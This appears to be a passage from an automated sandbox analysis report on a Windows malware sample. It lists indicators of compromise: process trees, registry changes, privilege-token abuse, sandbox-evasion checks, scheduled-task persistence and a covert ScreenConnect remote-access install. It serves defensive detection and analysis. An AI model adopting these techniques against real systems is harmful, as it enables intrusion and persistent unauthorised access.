Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 6116 5352 WerFault.exe 242 4332 5352 WerFault.exe 242 6116 5732 WerFault.exe 250 4888 7108 WerFault.exe 218 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e77a85cbca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74ea13a73f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 82f750008c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7fec148bf7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bff0f77eae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72ca34675a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 72ca34675a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0200dc27b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2cd8483345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fac2d9081.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4166e6a446b1425caaeb6333ae0f6c18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1dfd96b4d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 82f750008c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2cd8483345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5ccfe7cf7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1759409732.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c405ac4557.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 996031bb21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2d99bc583.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c8f28811c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language INOKWGC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df80c5b067.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efa7459f98b841dcbf8cc6e8b586c1a6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 72ca34675a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 70e25b8f18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11330f815f134a4cbe5bb3c2715f831b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZAj8wc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0200dc27b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 98144bfdcb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1dfd96b4d6.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6556 powershell.exe 7156 PING.EXE 6744 powershell.exe 6844 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 11330f815f134a4cbe5bb3c2715f831b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString efa7459f98b841dcbf8cc6e8b586c1a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 11330f815f134a4cbe5bb3c2715f831b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 efa7459f98b841dcbf8cc6e8b586c1a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3544 timeout.exe 5184 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 6364 taskkill.exe 6604 taskkill.exe 924 taskkill.exe 6284 taskkill.exe 6984 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe -
Modifies registry class 38 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 7156 PING.EXE 6844 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3280 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4408 file.exe 4408 file.exe 2700 skotes.exe 2700 skotes.exe 4828 NN9Dd7c.exe 680 powershell.exe 680 powershell.exe 5024 powershell.exe 5024 powershell.exe 3008 INOKWGC.exe 3008 INOKWGC.exe 4936 11330f815f134a4cbe5bb3c2715f831b.exe 4936 11330f815f134a4cbe5bb3c2715f831b.exe 3092 msedge.exe 3092 msedge.exe 5104 msedge.exe 5104 msedge.exe 3008 INOKWGC.exe 4252 UZAj8wc.exe 4252 UZAj8wc.exe 4252 UZAj8wc.exe 4252 UZAj8wc.exe 5516 74ea13a73f.exe 5516 74ea13a73f.exe 5856 identity_helper.exe 5856 identity_helper.exe 4244 msiexec.exe 4244 msiexec.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 4676 powershell.exe 4676 powershell.exe 4676 powershell.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5416 df80c5b067.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 836 7fec148bf7.exe 836 7fec148bf7.exe 4252 UZAj8wc.exe 4252 UZAj8wc.exe 5704 InstallUtil.exe 5704 InstallUtil.exe 4328 c405ac4557.exe 4328 c405ac4557.exe 3020 skotes.exe 3020 skotes.exe 5524 e77a85cbca.exe 5524 e77a85cbca.exe 5528 1759409732.exe 5528 1759409732.exe 5548 powershell.exe 5548 powershell.exe 5548 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4828 NN9Dd7c.exe Token: SeDebugPrivilege 680 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 544 ga70pjP.exe Token: SeShutdownPrivilege 4708 msiexec.exe Token: SeIncreaseQuotaPrivilege 4708 msiexec.exe Token: SeSecurityPrivilege 4244 msiexec.exe Token: SeCreateTokenPrivilege 4708 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4708 msiexec.exe Token: SeLockMemoryPrivilege 4708 msiexec.exe Token: SeIncreaseQuotaPrivilege 4708 msiexec.exe Token: SeMachineAccountPrivilege 4708 msiexec.exe Token: SeTcbPrivilege 4708 msiexec.exe Token: SeSecurityPrivilege 4708 msiexec.exe Token: SeTakeOwnershipPrivilege 4708 msiexec.exe Token: SeLoadDriverPrivilege 4708 msiexec.exe Token: SeSystemProfilePrivilege 4708 msiexec.exe Token: SeSystemtimePrivilege 4708 msiexec.exe Token: SeProfSingleProcessPrivilege 4708 msiexec.exe Token: SeIncBasePriorityPrivilege 4708 msiexec.exe Token: SeCreatePagefilePrivilege 4708 msiexec.exe Token: SeCreatePermanentPrivilege 4708 msiexec.exe Token: SeBackupPrivilege 4708 msiexec.exe Token: SeRestorePrivilege 4708 msiexec.exe Token: SeShutdownPrivilege 4708 msiexec.exe Token: SeDebugPrivilege 4708 msiexec.exe Token: SeAuditPrivilege 4708 msiexec.exe Token: SeSystemEnvironmentPrivilege 4708 msiexec.exe Token: SeChangeNotifyPrivilege 4708 msiexec.exe Token: SeRemoteShutdownPrivilege 4708 msiexec.exe Token: SeUndockPrivilege 4708 msiexec.exe Token: SeSyncAgentPrivilege 4708 msiexec.exe Token: SeEnableDelegationPrivilege 4708 msiexec.exe Token: SeManageVolumePrivilege 4708 msiexec.exe Token: SeImpersonatePrivilege 4708 msiexec.exe Token: SeCreateGlobalPrivilege 4708 msiexec.exe Token: SeCreateTokenPrivilege 4708 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4708 msiexec.exe Token: SeLockMemoryPrivilege 4708 msiexec.exe Token: SeIncreaseQuotaPrivilege 4708 msiexec.exe Token: SeMachineAccountPrivilege 4708 msiexec.exe Token: SeTcbPrivilege 4708 msiexec.exe Token: SeSecurityPrivilege 4708 msiexec.exe Token: SeTakeOwnershipPrivilege 4708 msiexec.exe Token: SeLoadDriverPrivilege 4708 msiexec.exe Token: SeSystemProfilePrivilege 4708 msiexec.exe Token: SeSystemtimePrivilege 4708 msiexec.exe Token: SeProfSingleProcessPrivilege 4708 msiexec.exe Token: SeIncBasePriorityPrivilege 4708 msiexec.exe Token: SeCreatePagefilePrivilege 4708 msiexec.exe Token: SeCreatePermanentPrivilege 4708 msiexec.exe Token: SeBackupPrivilege 4708 msiexec.exe Token: SeRestorePrivilege 4708 msiexec.exe Token: SeShutdownPrivilege 4708 msiexec.exe Token: SeDebugPrivilege 4708 msiexec.exe Token: SeAuditPrivilege 4708 msiexec.exe Token: SeSystemEnvironmentPrivilege 4708 msiexec.exe Token: SeChangeNotifyPrivilege 4708 msiexec.exe Token: SeRemoteShutdownPrivilege 4708 msiexec.exe Token: SeUndockPrivilege 4708 msiexec.exe Token: SeSyncAgentPrivilege 4708 msiexec.exe Token: SeEnableDelegationPrivilege 4708 msiexec.exe Token: SeManageVolumePrivilege 4708 msiexec.exe Token: SeImpersonatePrivilege 4708 msiexec.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 4408 file.exe 4708 msiexec.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 4708 msiexec.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe -
Suspicious use of SendNotifyMessage 55 IoCs
pid Process 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 5104 msedge.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe 6848 72ca34675a.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5704 InstallUtil.exe 4084 firefox.exe 5760 4166e6a446b1425caaeb6333ae0f6c18.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4408 wrote to memory of 2700 4408 file.exe 83 PID 4408 wrote to memory of 2700 4408 file.exe 83 PID 4408 wrote to memory of 2700 4408 file.exe 83 PID 2700 wrote to memory of 4828 2700 skotes.exe 85 PID 2700 wrote to memory of 4828 2700 skotes.exe 85 PID 2700 wrote to memory of 4828 2700 skotes.exe 85 PID 4828 wrote to memory of 680 4828 NN9Dd7c.exe 93 PID 4828 wrote to memory of 680 4828 NN9Dd7c.exe 93 PID 4828 wrote to memory of 680 4828 NN9Dd7c.exe 93 PID 4828 wrote to memory of 5024 4828 NN9Dd7c.exe 97 PID 4828 wrote to memory of 5024 4828 NN9Dd7c.exe 97 PID 4828 wrote to memory of 5024 4828 NN9Dd7c.exe 97 PID 2700 wrote to memory of 544 2700 skotes.exe 99 PID 2700 wrote to memory of 544 2700 skotes.exe 99 PID 2700 wrote to memory of 544 2700 skotes.exe 99 PID 544 wrote to memory of 4708 544 ga70pjP.exe 103 PID 544 wrote to memory of 4708 544 ga70pjP.exe 103 PID 544 wrote to memory of 4708 544 ga70pjP.exe 103 PID 4244 wrote to memory of 772 4244 msiexec.exe 106 PID 4244 wrote to memory of 772 4244 msiexec.exe 106 PID 4244 wrote to memory of 772 4244 msiexec.exe 106 PID 772 wrote to memory of 4696 772 MsiExec.exe 107 PID 772 wrote to memory of 4696 772 MsiExec.exe 107 PID 772 wrote to memory of 4696 772 MsiExec.exe 107 PID 4828 wrote to memory of 4936 4828 NN9Dd7c.exe 110 PID 